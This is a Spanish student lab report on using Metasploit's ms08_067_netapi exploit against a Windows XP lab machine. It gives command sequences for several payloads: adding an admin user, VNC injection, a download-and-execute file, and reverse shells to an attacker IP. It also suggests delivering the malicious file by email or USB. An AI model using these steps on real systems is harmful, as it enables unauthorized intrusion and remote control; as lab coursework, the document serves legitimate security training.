Вы находитесь на странице: 1из 13

Actividad 3.

3 Metasploit
Integrantes:
Jonathan Miguel Aguirre Parra
Elias Bermudez Márquez

Proceso de la actividad
Se inicia el Metasploit Framework con el siguiente comando: msfconsole

Realizamos la búsqueda específica del exploit utilizando el siguiente comando:


search ms08_067_netapi (Se hizo uso de este exploit debido a que tiene una
fecha de divulgación más reciente que el utilizado en la actividad)

Ya una vez encontrado el exploit, se debe seleccionar a través del siguiente


comando: use [nombre_exploit]

Con este comando le estamos diciendo a Metasploit que utilizaremos el exploit


Microsoft Netapi.

Ahora después de esto necesitamos seleccionar un sistema vulnerable, para ver


los sistemas afectados por Metasploit utilizaremos el comando: show targets
nos mostrará una pantalla como la siguiente con todos los sistemas operativos
vulnerables:
En este caso son varios los sistemas vulnerables con este exploit. Nuestro equipo
victima hace uso de Windows XP por tal motivo este exploit es el indicado para
dicho sistema.

Por defecto se va dejar el objetivo (TARGET) automático.

Teniendo el objetivo, falta indicar que tipo de ataque vamos a realizar. Con el
siguiente comando podemos visualizar todos los PAYLOADs disponibles para
realizar un posible ataque a la víctima: show PAYLOADS
PAYLOAD MÁS COMUNES

1. win32_adduser: Agregara un usuario (con permisos elevados) al sistema que


penetremos.
Aplicando el PAYLOAD

Mostrando las opciones disponibles

Nota: En este caso se tiene asignado los parámetros por defecto, cuya configuración se
tiene de la siguiente forma, nombre de usuario como “Metasploit” y contraseña
como “Metasploit$1”

Cambiando parámetros
Realizando ataque “exploit”

Comprobando en la PC de la víctima

2. win32_bind_vncinject: Nos mostrará una pantalla del usuario con la cual


podemos manejar y controlar el equipo remotamente (un VNC).

Usar un exploit y mostrar las opciones disponibles (el mismo del paso anterior)
Aplicar la IP de la víctima

Aplicando el PAYLOAD y mostrando las opciones disponibles

Nota: Al ver las configuraciones disponibles, vemos que ya está configurada sólo
establecer la IP de la víctima (en nuestro caso es 192.168.1.10) y el puerto (usaremos
el puerto 4444 que está disponible).

Realizando el ataque (exploit)


3. win32_downloadexec: Descargará un archivo de algún servidor web o ftp y
lo ejecutará (entre ellos puede estar troyanos u otros como backdoors).
Seleccionar un PAYLOAD (con ningún exploit) y mostrando las configuraciones

Nota: Las opciones del “PAYLOAD” que me permite generar el downloadEXEC (archivo
malicioso), pide la dirección IP del atacante y el puerto en que se va a vigilar (o en
escucha de la red).

Para pasar el archivo maliciosos, puede usar de diversos medios como por correo, vía
FTP, vía LAN (red interna de la empresa), por USB, etc. Una vez que el cliente lo tenga,
solo tener mucha paciencia para esperar en enlace con el cliente

Usar un exploit y mostrar las opciones disponibles (el mismo del paso anterior)
Nota: El exploit asignado es un (exploit/multi/handler) para recibir cualquier
vulnerabilidad configurado previamente (en este caso el EXE generado)

Establecemos el mismo PAYLOAD en que usamos con anterioridad en que generamos


el archivo malicioso y mostrar.

Establecemos la IP del atacante

Ejecutamos el ataque (exploit)


Listamos las sesiones capturadas

La víctima ejecuta el archivo

Se genera una sesión activa, para entrar o tomar control del equipo entramos, tomamos
el id de la sesión
4. win32_exec: Ejecutará un comando especificado por ti en la variable CMD.

A través del siguiente comando lo seleccionamos:


set PAYLOAD windows/exec

Después de seleccionar el PAYLOAD correspondiente, vamos a revisar los datos


que necesita para realizar el ataque a través del comando: show options

Para el caso del RHOST se asigna la IP de la víctima con el siguiente comando


set RHOST (set 192.168.1.10)

Para el caso de EXITFUNC en nuestro caso le asignamos un proceso a través


del comando: set EXITFUNC process

Y por último en CMD se coloca un proceso, el cual seleccionamos abrir el bloc


de notas de la víctima: set CMD notepad.exe
Por ultimo colocamos el comando exploit para lanzar el ataque con las variables
anteriormente utilizadas:

Como podemos observar al parecer el payload se ejecuta de forma correcta pero


al momento de revisar la maquina víctima no ha sucedido nada por ende se llega
a la conclusión de que si es posible ejecutar el payload pero en este momento no
funciona y no hace efecto alguno sobre el equipo víctima.

5. win32_reverse: Nos dará un shell inversa por si tiene firewall y no podemos


abrir puertos.

A través del siguiente comando lo seleccionamos:


set PAYLOAD windows/shell/reverse_tcp

Después de seleccionar el PAYLOAD correspondiente, vamos a revisar los datos


que necesita para realizar el ataque a través del comando: show options

Para el caso del RHOST se asigna la IP de la víctima con el siguiente comando


set RHOST (set 192.168.1.10)

Para el caso del LHOST se asigna la IP del atacante con el siguiente comando
set LHOST (set 192.168.1.20)
Por ultimo colocamos el comando exploit para lanzar el ataque con las variables
anteriormente utilizadas:

Este PAYLOAD nos permite obtener una sesión en modo administrador del
símbolo del sistema en el equipo víctima.

6. win32_reverse_vncinject: Nos dará un VNC inverso por si tiene firewall y


no podemos abrir puertos.

A través del siguiente comando lo seleccionamos


set PAYLOAD windows/vncinject/reverse_tcp

Después de seleccionar el PAYLOAD correspondiente, vamos a revisar los datos


que necesita para realizar el ataque a través del comando: show options
En este caso nos muestra todas las opciones pero solo vamos a rellenar las
requeridas del exploit que son RHOST y LPORT, las demás opciones ya tienen
una configuración por defecto y no es necesario modificarlas. Otra opción
importante es el puerto pero este ya viene por defecto y vamos hacer uso del
445.

Para el caso del RHOST se asigna la IP de la víctima con el siguiente comando


set RHOST (set 192.168.1.10)

Para el caso del LHOST se asigna la IP del atacante con el siguiente comando
set LHOST (set 192.168.1.20)
Por ultimo colocamos el comando exploit para lanzar el ataque con las variables
anteriormente utilizadas:

Nos informa que fue correctamente ejecutado el exploit y nos abre una nueva
ventana donde podemos observar el escritorio de nuestra víctima y todo lo que
esta realiza dentro de la maquina.

Вам также может понравиться